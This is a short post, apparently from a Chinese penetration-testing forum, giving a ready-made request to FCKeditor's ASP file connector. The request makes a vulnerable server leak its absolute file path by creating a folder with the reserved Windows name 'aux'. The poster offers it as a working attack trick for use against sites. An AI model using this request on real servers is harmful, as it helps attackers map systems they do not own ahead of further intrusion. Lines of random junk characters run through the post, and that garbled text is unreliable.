中国网络渗透测试联盟
标题:
最新FCKeditor爆绝对路径漏洞
[打印本页]
作者:
admin
时间:
2012-11-21 13:39
标题:
最新FCKeditor爆绝对路径漏洞
代码:FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=%2F&NewFolderName=aux
! n' u! A% s: d, }# w
7 u* P4 S3 A. ? k4 }9 L/ S8 _
6 V9 h5 U8 ~) o! l& B" S* R
版本未测试。。。
* ?+ C; p! Q- `, ?5 v
3 `% z# u n. K7 I3 ?0 ^! v3 n
原理:新建个aux文件夹,aux在windows系统不支持,所以会报错,爆出绝对路径,这个比较鸡肋。求大神别喷。。。
+ Q$ \ f* S9 S# ?
+ O2 w7 a) w% f6 Y; L
0 Y+ W. W& u4 q7 P9 q! z8 {4 c/ K
听说IIS都可以。。
: i! k9 O- v% G8 _( D5 j0 D' m
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2